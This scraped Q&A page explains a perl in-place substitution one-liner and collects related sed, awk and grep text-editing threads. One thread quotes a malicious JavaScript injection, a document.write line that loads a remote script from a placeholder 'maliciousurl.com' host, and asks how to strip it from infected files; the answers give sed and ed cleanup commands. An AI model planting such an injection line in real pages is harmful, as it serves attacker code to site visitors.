Please explain one line of perl code - perl

I have such line from https://camlistore.googlesource.com/camlistore/+/master/third_party/rewrite-imports.sh
find . -type f -name '*.go' -exec perl -pi -e 's!"code.google.com/!"camlistore.org/third_party/code.google.com/!' {} \;
I would like help understanding what exactly this does:
perl -pi -e 's!"code.google.com/!"camlistore.org/third_party/code.google.com/!'
Especialy exclamation marks and ". Thanks!

From perldoc perlrun:
-p means "run the expression for each line, and print the result"
-i means "edit the input file in place"
-e means "the next parameter is the Perl expression to evaluate"
For the expression itself:
The ! marks are the separators for the s (substitution) operator. Any non-alphanumeric character can be used for that - whatever follows the s.
The " characters don't mean anything special, they're just part of the text to be replaced, and the replacement.
So we have:
s: substitute
!: (separator)
"code.google.com/: text to find
!: (separator)
"camlistore.org/third_party/code.google.com/: replacement text
!: (separator)
Which all means:
For each line in the file
Find the text "code.google.com/
And (if found) replace it with "camlistore.org/third_party/code.google.com/

The bangs ! are just an alternative delimiter for the search and replace regex s///.
Because the content of the search and replace includes forward slashes, it makes sense to use a different delimiter to avoid having to escape them all. Exclamation points are sometimes used for this purpose s!!!, but my preferred alternate are braces: s{}{}.
As for what that code is done, it's replacing all references to "code.google.com/ with "camlistore.org/third_party/code.google.com/ in the found files.

This is a pretty straightforward search-and-replace. The s/PATTERN/REPLACEMENT/ operator sees if a string matches the regular expression pattern and replaces the part that matches with the value of the replacement string.
Since sometimes / characters are an inconvenient delimiter (such as dealing with web URIs), Perl allows you to swap them out for other characters, in this case they chose to use !.
The -p switch causes Perl to assume a loop around the code in question for processing lines. The -i switch allows input lines to be edited in-place as they are processed, optionally preserving the original in another file. (See perldoc perlrun for the gory details.)
So all this code is doing is replacing lines that contain "code.google.com/ with "camlistore.org/third_party/code.google.com/.

Related

How to replace a comment line which start with specific characters

I have a fortran code with global comments, which start with a double exclamation mark (i.e., !!) and personal comments, which start with a single exclamation mark (i.e., !), and I just want to hide my personal comment lines (or substitute the line with another line, e.g., '! jw'). For example, the original code looks like this:
!! This is a global comment
Code..
Code..
! This is a personal comment
code... ! This is a personal comment
!! This is a global comment
code...
Then, I want to update the original code as:
!! This is a global comment
Code..
Code..
! jw
code... ! jw
!! This is a global comment
code...
I have tried to use "sed" and "awk", but I failed. So, would someone can help me? I prefer to use "sed" instead "awk" by the way.
Use Perl one-liner with negative lookbehind pattern:
perl -pe 's/(?<!!)!\s.*/! jw/' in_file > out_file
To change the file in-place:
perl -i.bak -pe 's/(?<!!)!\s.*/! jw/' in_file
To change multiple files in-place, for example ex*.f90 files:
perl -i.bak -pe 's/(?<!!)!\s.*/! jw/' ex*.f90
The Perl one-liner uses these command line flags:
-e : Tells Perl to look for code in-line, instead of in a file.
-p : Loop over the input one line at a time, assigning it to $_ by default. Add print $_ after each loop iteration.
-i.bak : Edit input files in-place (overwrite the input file). Before overwriting, save a backup copy of the original file by appending to its name the extension .bak.
(?<!!)! : Exclamation point that is not preceded by an exclamation point.
\s : Whitespace.
.* : Any character, repeated 0 or more times.
SEE ALSO:
perldoc perlrun: how to execute the Perl interpreter: command line switches
perldoc perlre: Perl regular expressions (regexes)
perldoc perlre: Perl regular expressions (regexes): Quantifiers; Character Classes and other Special Escapes; Assertions; Capture groups
perldoc perlre: Negative lookbehind
perldoc perlrequick: Perl regular expressions quick start
sed '/!!/!s/!.*/! jw/' file
/!!/! If the line does not contain !!, then
s/!.*/! jw/ substitute all following a exclamation mark with ! jw.
awk 'BEGIN{FS=OFS="!"}$2{$2=" jw"}1' file
BEGIN{FS=OFS="!"} Set the field separators to !.
$2{$2=" jw"} If the 2nd field is not empty, substitute it by jw.
1 Print the line.
If the line starts with ! then you could do something like
sed 's/^! /! jw/' mycode.fortran >newcodefile.fortran
I would put it into a new file then rename after. If you overwrite your file you could end up cause problems if anything goes wrong.
The s in the string to sed tells it to search, and replace.
the ^ means start of line, so if the comment is further in the line than the beginning this won't find that comment.
Then we search for a line that starts with ! followed by a space and replace with ! jw
If you just run it as:
sed 's/^! /! jw/' mycode.fortran
without redirecting the output to a file it will stream the output to your console so you can see if it's working. Then run it again output to a file with the redirect >, check the file then do your renaming. Don't get rid of your original code file until your completely sure it worked and didn't do anything you didn't want.

Extracting substring from inside bracketed string, where the substring may have spaces

I've got an application that has no useful api implemented, and the only way to get certain information is to parse string output. This is proving to be very painful...
I'm trying to achieve this in bash on SLES12.
Given I have the following strings:
QMNAME(QMTKGW01) STATUS(Running)
QMNAME(QMTKGW01) STATUS(Ended normally)
I want to extract the STATUS value, ie "Ended normally" or "Running".
Note that the line structure can move around, so I can't count on the "STATUS" being the second field.
The closest I have managed to get so far is to extract a single word from inside STATUS like so
echo "QMNAME(QMTKGW01) STATUS(Running)" | sed "s/^.*STATUS(\(\S*\)).*/\1/"
This works for "Running" but not for "Ended normally"
I've tried switching the \S* for [\S\s]* in both "grep -o" and "sed" but it seems to corrupt the entire regex.
This is purely a regex issue, by doing \S you requested to match non-white space characters within (..) but the failing case has a space between which does not comply with the grammar defined. Make it simple by explicitly calling out the characters to match inside (..) as [a-zA-Z ]* i.e. zero or more upper & lower case characters and spaces.
sed 's/^.*STATUS(\([a-zA-Z ]*\)).*/\1/'
Or use character classes [:alnum:] if you want numbers too
sed 's/^.*STATUS(\([[:alnum:] ]*\)).*/\1/'
sed 's/.*STATUS(\([^)]*\)).*/\1/' file
Output:
Running
Ended normally
Extracting a substring matching a given pattern is a job for grep, not sed. We should use sed when we must edit the input string. (A lot of people use sed and even awk just to extract substrings, but that's wasteful in my opinion.)
So, here is a grep solution. We need to make some assumptions (in any solution) about your input - some are easy to relax, others are not. In your example the word STATUS is always capitalized, and it is immediately followed by the opening parenthesis (no space, no colon etc.). These assumptions can be relaxed easily. More importantly, and not easy to work around: there are no nested parentheses. You will want the longest substring of non-closing-parenthesis characters following the opening parenthesis, no mater what they are.
With these assumptions:
$ grep -oP '\bSTATUS\(\K[^)]*(?=\))' << EOF
> QMNAME(QMTKGW01) STATUS(Running)
> QMNAME(QMTKGW01) STATUS(Ended normally)
> EOF
Running
Ended normally
Explanation:
Command options: o to return only the matched substring; P to use Perl extensions (the \K marker and the lookahead). The regexp: we look for a word boundary (\b) - so the word STATUS is a complete word, not part of a longer word like SUBSTATUS; then the word STATUS and opening parenthesis. This is required for a match, but \K instructs that this part of the matched string will not be returned in the output. Then we seek zero or more non-closing-parenthesis characters ([^)]*) and we require that this be followed by a closing parenthesis - but the closing parenthesis is also not included in the returned string. That's a "lookahead" (the (?= ... ) construct).

Why is my sed multiline find-and-replace not working as expected?

I have a simple sed command that I am using to replace everything between (and including) //thistest.com-- and --thistest.com with nothing (remove the block all together):
sudo sed -i "s#//thistest\.com--.*--thistest\.com##g" my.file
The contents of my.file are:
//thistest.com--
zone "awebsite.com" {
type master;
file "some.stuff.com.hosts";
};
//--thistest.com
As I am using # as my delimiter for the regex, I don't need to escape the / characters. I am also properly (I think) escaping the . in .com. So I don't see exactly what is failing.
Why isn't the entire block being replaced?
You have two problems:
Sed doesn't do multiline pattern matches—at least, not the way you're expecting it to. However, you can use multiline addresses as an alternative.
Depending on your version of sed, you may need to escape alternate delimiters, especially if you aren't using them solely as part of a substitution expression.
So, the following will work with your posted corpus in both GNU and BSD flavors:
sed '\#^//thistest\.com--#, \#^//--thistest\.com# d' /tmp/corpus
Note that in this version, we tell sed to match all lines between (and including) the two patterns. The opening delimiter of each address pattern is properly escaped. The command has also been changed to d for delete instead of s for substitute, and some whitespace was added for readability.
I've also chosen to anchor the address patterns to the start of each line. You may or may not find that helpful with this specific corpus, but it's generally wise to do so when you can, and doesn't seem to hurt your use case.
# separation by line with 1 s//
sed -n -e 'H;${x;s#^\(.\)\(.*\)\1//thistest.com--.*\1//--thistest.com#\2#;p}' YourFile
# separation by line with address pattern
sed -e '\#//thistest.com--#,\#//--thistest.com# d' YourFile
# separation only by char (could be CR, CR/LF, ";" or "oneline") with s//
sed -n -e '1h;1!H;${x;s#//thistest.com--.*\1//--thistest.com##;p}' YourFile
Note:
assuming there is only 1 section thistest per file (if not, it remove anything between the first opening until the last closing section) for the use of s//
does not suite for huge file (load entire file into memory) with s//
sed using addresses pattern cannot select section on the same line, it search 1st pattern to start, and a following line to stop but very efficient on big file and/or multisection

How to delete multiple lines from text file, including matched line?

I found some malicious JavaScript inserted into dozens of files.
The malicious code looks like this:
/*123456*/
document.write('<script type="text/javascript" src="http://maliciousurl.com/asdf/KjdfL4ljd?id=9876543"></script>');
/*/123456*/
Some kind of opening tag, the document.write that inserts the remote script, a seemingly empty line, and then their "closing tag."
In a comment on this Stack Overflow answer I found out how to delete a single line in a single file.
sed -i '/pattern to match/d' ./infile
But I need to delete one line before, and two lines after, and again it is in at least a few dozen files.
So I think I could perhaps use grep -lr to find the file names, then pass each one to sed and somehow remove the matching line, as well as one before and 2 after (4 lines total). Pattern to match could be "\n*\nmaliciousurl\n\n*\n"?
I also tried this, trying to replace the pattern with empty string. The .* are the hex numbers in the opening/closing tags, and also the stuff between the tags.
sed -e '\%/\*.*\*/.*maliciousurl.*/\*/.*\*/%,\%%d' test.js
You need to match on the begin and end comments, not the document.write line:
sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d'
This uses the % symbol in place of the more normal / to delimit the patterns, which is usually a good idea when the pattern contains slashed and doesn't contain % symbols. The leading \ tells sed that the following character is the pattern delimiter. You can use any character (except backslash or newline) in place of the %; Control-A is another good one to consider.
From the sed manual on Mac OS X:
In a context address, any character other than a backslash ('\') or newline
character may be used to delimit the regular expression. Also, putting a backslash character before the delimiting character causes the character to be
treated literally. For example, in the context address \xabc\xdefx, the RE
delimiter is an 'x' and the second 'x' stands for itself, so that the regular expression is 'abcxdef'.
Now, if in fact your pattern isn't as easily identified as the /*123456*/ you show in the example, then maybe you are forced to key off the malicious URL. However, in that case, you cannot use sed very easily; it cannot do relative offsets (/x/+1 is not allowed, let alone /x/-1). At that point, you probably fall back on ed (or perhaps ex):
ed - $file <<'EOF'
g/maliciousurl.com/.-1,.+2d
w
q
EOF
This does a global search for the malicious URL, and with each occurrence, deletes from the line before the current line (.-1) to two lines after it (.+2). Then write the file and quit.

Confining Substitution to Match Space Using sed?

Is there a way to substitute only within the match space using sed?
I.e. given the following line, is there a way to substitute only the "." chars that are contained within the matching single quotes and protect the "." chars that are not enclosed by single quotes?
Input:
'ECJ-4YF1H10.6Z' ! 'CAP' ! '10.0uF' ! 'TOL' ; MGCDC1008.S1 MGCDC1009.A2
Desired result:
'ECJ-4YF1H10-6Z' ! 'CAP' ! '10_0uF' ! 'TOL' ; MGCDC1008.S1 MGCDC1009.A2
Or is this just a job to which perl or awk might be better suited?
Thanks for your help,
Mark
Give the following a try which uses the divide-and-conquer technique:
sed "s/\('[^']*'\)/\n&\n/g;s/\(\n'[^.]*\)\.\([^']*Z'\)/\1-\2/g;s/\(\n'[^.]*\)\.\([^']*uF'\)/\1_\2/g;s/\n//g" inputfile
Explanation:
s/\('[^']*'\)/\n&\n/g - Add newlines before and after each pair of single quotes with their contents
s/\(\n'[^.]*\)\.\([^']*Z'\)/\1-\2/g - Using a newline and the single quotes to key on, replace the dot with a dash for strings that end in "Z"
s/\(\n'[^.]*\)\.\([^']*uF'\)/\1_\2/g - Using a newline and the single quotes to key on, replace the dot with a dash for strings that end in "uF"
s/\n//g - Remove the newlines added in the first step
You can restrict the command to acting only on certain lines:
sed "/foo/{s/\('[^']*'\)/\n&\n/g;s/\(\n'[^.]*\)\.\([^']*Z'\)/\1-\2/g;s/\(\n'[^.]*\)\.\([^']*uF'\)/\1_\2/g;s/\n//g}" inputfile
where you would substitute some regex in place of "foo".
Some versions of sed like to be spoon fed (instead of semicolons between commands, use -e):
sed -e "/foo/{s/\('[^']*'\)/\n&\n/g" -e "s/\(\n'[^.]*\)\.\([^']*Z'\)/\1-\2/g" -e "s/\(\n'[^.]*\)\.\([^']*uF'\)/\1_\2/g" -e "s/\n//g}" inputfile
$ cat phoo1234567_sedFix.sed
#! /bin/sed -f
/'[0-9][0-9]\.[0-9][a-zA-Z][a-zA-Z]'/s/'\([0-9][0-9]\)\.\([0-9][a-zA-Z][a-zA-Z]\)'/\1_\2/
This answers your specific question. If the pattern you need to fix isn't always like the example you provided, they you'll need multiple copies of this line, with reg-expressions modified to match your new change targets.
Note that the cmd is in 2 parts, "/'[0-9][0-9].[0-9][a-zA-Z][a-zA-Z]'/" says, must match lines with this pattern, while the trailing "s/'([0-9][0-9]).([0-9][a-zA-Z][a-zA-Z])'/\1_\2/", is the part that does the substitution. You can add a 'g' after the final '/' to make this substitution happen on all instances of this pattern in each line.
The \(\) pairs in match pattern get converted into the numbered buffers on the substitution side of the command (i.e. \1 \2). This is what gives sed power that awk doesn't have.
If your going to do much of this kind of work, I highly recommend O'Rielly's Sed And Awk book. The time spent going thru how sed works will be paid back many times.
I hope this helps.
P.S. as you appear to be a new user, if you get an answer that helps you please remember to mark it as accepted, or give it a + (or -) as a useful answer.
this is a job most suitable for awk or any language that supports breaking/splitting strings.
IMO, using sed for this task, which is regex based , while doable, is difficult to read and debug, hence not the most appropriate tool for the job. No offense to sed fanatics.
awk '{
for(i=1;i<=NF;i++) {
if ($i ~ /\047/ ){
gsub(".","_",$i)
}
}
}1' file
The above says for each field (field seperator by default is white space), check to see if there is a single quote, and if there is , substitute the "." to "_". This method is simple and doesn't need complicated regex.